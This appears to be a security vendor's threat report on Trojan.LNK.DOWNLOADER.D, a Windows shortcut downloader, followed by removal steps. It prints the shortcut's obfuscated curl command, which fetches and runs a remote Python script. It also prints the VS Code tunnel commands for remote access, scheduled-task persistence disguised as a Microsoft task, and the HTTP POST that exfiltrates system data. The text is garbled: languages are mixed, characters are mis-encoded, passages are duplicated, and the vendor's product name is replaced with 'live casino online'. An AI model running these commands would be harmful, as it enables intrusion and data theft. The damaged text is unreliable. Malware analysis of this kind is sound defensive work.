Trojan.LNK.DOWNLOADER.D
Data de publica??o: 02 outubro 2024
HEUR:Trojan.WinLNK.Agent.gen (KASPERSKY)
Plataforma:
Windows
Classificao do risco total:
Potencial de dano:
Potencial de distribui??o:
infec??o relatada:
Exposi??o das informa??es:
Baixo
Medium
Alto
°ä°ù¨ª³Ù¾±³¦´Ç
Tipo de grayware:
Trojan
Destrutivo:
N?o
Criptografado:
In the Wild:
Sim
Vis?o geral
Canal de infec??o: Aus dem Internet heruntergeladen, Fallen gelassen von anderer Malware
It arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.
Detalhes t¨¦cnicos
Tipo de compacta??o: 2,044 bytes
Tipo de arquivo: LNK
Data de recebimento das amostras iniciais: 30 setembro 2024
Carga ¨²til: Drops files, Connects to URLs/IPs
?bertragungsdetails
It arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.
Installation
Schleust die folgenden Dateien ein:
- %AppDataLocal%\Microsoft\Python\update.py
- %AppDataLocal%\Microsoft\python.zip
- After extracting to %AppDataLocal%\Microsoft\Python:
- _asyncio.pyd
- _bz2.pyd
- _ctypes.pyd
- _decimal.pyd
- _elementtree.pyd
- _hashlib.pyd
- _lzma.pyd
- _msi.pyd
- _multiprocessing.pyd
- _overlapped.pyd
- _queue.pyd
- _socket.pyd
- _sqlite3.pyd
- _ssl.pyd
- _uuid.pyd
- _wmi.pyd
- _zoneinfo.pyd
- libcrypto-3.dll
- libffi-8.dll
- libssl-3.dll
- LICENSE.txt
- pyexpat.pyd
- python.cat
- python.exe
- python.zip
- python3.dll
- python312._pth
- python312.dll
- python312.zip
- pythonw.exe
- select.pyd
- sqlite3.dll
- unicodedata.pyd
- vcruntime140_1.dll
- vcruntime140.dll
- winsound.pyd
- After extracting to %AppDataLocal%\Microsoft\Python:
F¨¹gt die folgenden Prozesse hinzu:
- "%System%\cmd.exe" /c start msg {Username} "°²Ñb³É¹¦" & c^u^r^l -s -k https://www.{BLOCKED}n.org/ftp/python/3.12.5/python-3.12.5-embed-amd64.zip -o "%AppDataLocal%\Microsoft\python.zip" & timeout 10 & mkdir "%AppDataLocal%\Microsoft\Python" & tar -xf "%AppDataLocal%\Microsoft\python.zip" -C "%AppDataLocal%\Microsoft\Python" & c^u^r^l -s -k https://{BLOCKED}e.ee/r/DQjrd/0 -o "%AppDataLocal%\Microsoft\Python\update.py" & start "" /B "%AppDataLocal%\Microsoft\Python\pythonw.exe" "%AppDataLocal%\Microsoft\Python\update.py"
Erstellt die folgenden Ordner:
- %AppDataLocal%\Microsoft\Python
Download-Routine
Speichert die heruntergeladenen Dateien unter den folgenden Namen:
- %AppDataLocal%\Microsoft\python.zip ¡ú legitimate Python 3.12.5 x64 zip file
- %AppDataLocal%\Microsoft\Python\update.py ¡ú malicious Python code
Andere Details
Es macht Folgendes:
- It sends Windows message "°²Ñb³É¹¦" translated to "Installation successful".
- It downloads a legitimate 64-bit Python 3.12.5 embedded zip file and extracts its contents.
- It downloads a malicious Python script file from a URL and executes using the extracted Python package.
- It requires the following command line tools to proceed with its intended routine:
- curl
- tar
- The executed Python code does the following:
- It fetches running processes using tasklist command.
- It connects to the following URL(s) to download its component file(s):
- https://{BLOCKED}95.vo.msecnd.net/stable/97dec172d3256f8ca4bfb2143f3f76b503ca0534/vscode_cli_win32_x64_cli.zip
- It saves the files it downloads using the following names:
- %AppDataLocal%\Microsoft\vscode.zip ¡ú contains a file named code.exe
- It adds the following folders:
- %AppDataLocal%\Microsoft\VSCode
- It extracts the zip file into the created folder with the following filename:
- %AppDataLocal%\Microsoft\VSCode\code.exe
- After extraction, it deletes the previously downloaded zip file.
- It adds the following processes:
- %System%\cmd.exe /c "%AppDataLocal%\Microsoft\VSCode\code.exe tunnel --accept-server-license-terms user logout"
- %System%\cmd.exe /c "%AppDataLocal%\Microsoft\VSCode\code.exe --locale en-US tunnel --accept-server-license-terms --name "{Computer Name}"
- Saves the output into the following files:
- %AppDataLocal%\Microsoft\VSCode\output.txt
- %AppDataLocal%\Microsoft\VSCode\output2.txt
- Saves the output into the following files:
- schtasks /create /tn "MicrosoftHealthcareMonitorNode" /tr "%AppDataLocal%\Microsoft\Python\pythonw.exe %AppDataLocal%\Microsoft\Python\update.py" /st 08:00 /sc HOURLY /mo 4 /f
- schtasks /create /tn "MicrosoftHealthcareMonitorNode" /tr "%AppDataLocal%\Microsoft\Python\pythonw.exe %AppDataLocal%\Microsoft\Python\update.py" /sc ONLOGON /ru SYSTEM /rl HIGHEST /f
- It retrieves the following information from the affected system:
- System Locale
- Computer Name
- Username
- User Domain
- %Program Files% Contents
- %ProgramData% Contents
- %System Root%\Users Contents
- It encodes the collected information into a Base64 format.
- It sends the gathered information via HTTP POST to the following URL:
- http://{BLOCKED}o.com/r/2yxp98b3/{Encoded Base64 String of Collected information}
- It adds the following scheduled tasks:
- If executed as user:
- Location: {Root Directory}
Name: MicrosoftHealthcareMonitorNode
Trigger: One time at 8:00 AM on {Scheduled Task Create Time} ¡ú After triggered, repeat every 04:00:00 indefinitely.
Action: Start a program ¡ú %AppDataLocal%\Microsoft\Python\pythonw.exe %AppDataLocal%\Microsoft\Python\update.py
- Location: {Root Directory}
- If executed as an administrator:
- Location: {Root Directory}
Name: MicrosoftHealthcareMonitorNode
Trigger: At log on of any user
Action: Start a program ¡ú %AppDataLocal%\Microsoft\Python\pythonw.exe %AppDataLocal%\Microsoft\Python\update.py
- Location: {Root Directory}
- If executed as user:
Solu??o
Mecanismo de varredura m¨ªnima: 9.800
Primeiro arquivo padr?o VSAPI: 19.624.03
Data do lan?amento do primeiro padr?o VSAPI: 01 outubro 2024
VSAPI OPR Pattern Version: 19.625.00
VSAPI OPR Pattern ver?ffentlicht am: 02 outubro 2024
Step 1
F¨¹r Windows ME und XP Benutzer: Stellen Sie vor einer Suche sicher, dass die Systemwiederherstellung deaktiviert ist, damit der gesamte Computer durchsucht werden kann.
Step 2
<p> Beachten Sie, dass nicht alle Dateien, Ordner, Registrierungsschlüssel und Einträge auf Ihrem Computer installiert sind, während diese Malware / Spyware / Grayware ausgeführt wird. Dies kann auf eine unvollständige Installation oder andere Betriebssystembedingungen zurückzuführen sein. Fahren Sie mit dem nächsten Schritt fort. </ p><p> Beachten Sie, dass nicht alle Dateien, Ordner, Registrierungsschlüssel und Einträge auf Ihrem Computer installiert sind, während diese Malware / Spyware / Grayware ausgeführt wird. Dies kann auf eine unvollständige Installation oder andere Betriebssystembedingungen zurückzuführen sein. Fahren Sie mit dem nächsten Schritt fort. </ p>
Step 3
Im abgesicherten Modus neu starten
[ Saber mais ]
Step 5
Diese Dateien suchen und l?schen
[ Saber mais ]
M?glicherweise sind einige Komponentendateien verborgen. Aktivieren Sie unbedingt das Kontrollk?stchen Versteckte Elemente durchsuchen unter "Weitere erweiterte Optionen", um alle verborgenen Dateien und Ordner in den Suchergebnissen zu ber¨¹cksichtigen. - %AppDataLocal%\Microsoft\Python\update.py
- %AppDataLocal%\Microsoft\Python\_asyncio.pyd
- %AppDataLocal%\Microsoft\Python\_bz2.pyd
- %AppDataLocal%\Microsoft\Python\_ctypes.pyd
- %AppDataLocal%\Microsoft\Python\_decimal.pyd
- %AppDataLocal%\Microsoft\Python\_elementtree.pyd
- %AppDataLocal%\Microsoft\Python\_hashlib.pyd
- %AppDataLocal%\Microsoft\Python\_lzma.pyd
- %AppDataLocal%\Microsoft\Python\_msi.pyd
- %AppDataLocal%\Microsoft\Python\_multiprocessing.pyd
- %AppDataLocal%\Microsoft\Python\_overlapped.pyd
- %AppDataLocal%\Microsoft\Python\_queue.pyd
- %AppDataLocal%\Microsoft\Python\_socket.pyd
- %AppDataLocal%\Microsoft\Python\_sqlite3.pyd
- %AppDataLocal%\Microsoft\Python\_ssl.pyd
- %AppDataLocal%\Microsoft\Python\_uuid.pyd
- %AppDataLocal%\Microsoft\Python\_wmi.pyd
- %AppDataLocal%\Microsoft\Python\_zoneinfo.pyd
- %AppDataLocal%\Microsoft\Python\libcrypto-3.dll
- %AppDataLocal%\Microsoft\Python\libffi-8.dll
- %AppDataLocal%\Microsoft\Python\libssl-3.dll
- %AppDataLocal%\Microsoft\Python\LICENSE.txt
- %AppDataLocal%\Microsoft\Python\pyexpat.pyd
- %AppDataLocal%\Microsoft\Python\python.cat
- %AppDataLocal%\Microsoft\Python\python.exe
- %AppDataLocal%\Microsoft\Python\python.zip
- %AppDataLocal%\Microsoft\Python\python3.dll
- %AppDataLocal%\Microsoft\Python\python312._pth
- %AppDataLocal%\Microsoft\Python\python312.dll
- %AppDataLocal%\Microsoft\Python\python312.zip
- %AppDataLocal%\Microsoft\Python\pythonw.exe
- %AppDataLocal%\Microsoft\Python\select.pyd
- %AppDataLocal%\Microsoft\Python\sqlite3.dll
- %AppDataLocal%\Microsoft\Python\unicodedata.pyd
- %AppDataLocal%\Microsoft\Python\vcruntime140_1.dll
- %AppDataLocal%\Microsoft\Python\vcruntime140.dll
- %AppDataLocal%\Microsoft\Python\winsound.pyd
- %AppDataLocal%\Microsoft\VSCode\code.exe
- %AppDataLocal%\Microsoft\VSCode\output.txt
- %AppDataLocal%\Microsoft\VSCode\output2.txt
- %AppDataLocal%\Microsoft\python.zip
- %AppDataLocal%\Microsoft\vscode.zip
- %AppDataLocal%\Microsoft\Python\update.py
- %AppDataLocal%\Microsoft\Python\_asyncio.pyd
- %AppDataLocal%\Microsoft\Python\_bz2.pyd
- %AppDataLocal%\Microsoft\Python\_ctypes.pyd
- %AppDataLocal%\Microsoft\Python\_decimal.pyd
- %AppDataLocal%\Microsoft\Python\_elementtree.pyd
- %AppDataLocal%\Microsoft\Python\_hashlib.pyd
- %AppDataLocal%\Microsoft\Python\_lzma.pyd
- %AppDataLocal%\Microsoft\Python\_msi.pyd
- %AppDataLocal%\Microsoft\Python\_multiprocessing.pyd
- %AppDataLocal%\Microsoft\Python\_overlapped.pyd
- %AppDataLocal%\Microsoft\Python\_queue.pyd
- %AppDataLocal%\Microsoft\Python\_socket.pyd
- %AppDataLocal%\Microsoft\Python\_sqlite3.pyd
- %AppDataLocal%\Microsoft\Python\_ssl.pyd
- %AppDataLocal%\Microsoft\Python\_uuid.pyd
- %AppDataLocal%\Microsoft\Python\_wmi.pyd
- %AppDataLocal%\Microsoft\Python\_zoneinfo.pyd
- %AppDataLocal%\Microsoft\Python\libcrypto-3.dll
- %AppDataLocal%\Microsoft\Python\libffi-8.dll
- %AppDataLocal%\Microsoft\Python\libssl-3.dll
- %AppDataLocal%\Microsoft\Python\LICENSE.txt
- %AppDataLocal%\Microsoft\Python\pyexpat.pyd
- %AppDataLocal%\Microsoft\Python\python.cat
- %AppDataLocal%\Microsoft\Python\python.exe
- %AppDataLocal%\Microsoft\Python\python.zip
- %AppDataLocal%\Microsoft\Python\python3.dll
- %AppDataLocal%\Microsoft\Python\python312._pth
- %AppDataLocal%\Microsoft\Python\python312.dll
- %AppDataLocal%\Microsoft\Python\python312.zip
- %AppDataLocal%\Microsoft\Python\pythonw.exe
- %AppDataLocal%\Microsoft\Python\select.pyd
- %AppDataLocal%\Microsoft\Python\sqlite3.dll
- %AppDataLocal%\Microsoft\Python\unicodedata.pyd
- %AppDataLocal%\Microsoft\Python\vcruntime140_1.dll
- %AppDataLocal%\Microsoft\Python\vcruntime140.dll
- %AppDataLocal%\Microsoft\Python\winsound.pyd
- %AppDataLocal%\Microsoft\VSCode\code.exe
- %AppDataLocal%\Microsoft\VSCode\output.txt
- %AppDataLocal%\Microsoft\VSCode\output2.txt
- %AppDataLocal%\Microsoft\python.zip
- %AppDataLocal%\Microsoft\vscode.zip
Step 6
Diese Ordner suchen und l?schen
[ Saber mais ]
Aktivieren Sie unbedingt das Kontrollk?stchen Versteckte Elemente durchsuchen unter Weitere erweiterte Optionen, um alle verborgenen Ordner in den Suchergebnissen zu ber¨¹cksichtigen. - %AppDataLocal%\Microsoft\Python
- %AppDataLocal%\Microsoft\VSCode
Step 7
F¨¹hren Sie den Neustart im normalen Modus durch, und durchsuchen Sie Ihren Computer mit Ihrem live casino online Produkt nach Dateien, die als Trojan.LNK.DOWNLOADER.D entdeckt werden. Falls die entdeckten Dateien bereits von Ihrem live casino online Produkt ges?ubert, gel?scht oder in Quarant?ne verschoben wurden, sind keine weiteren Schritte erforderlich. Dateien in Quarant?ne k?nnen einfach gel?scht werden. Auf dieser finden Sie weitere Informationen.
Participe da nossa pesquisa!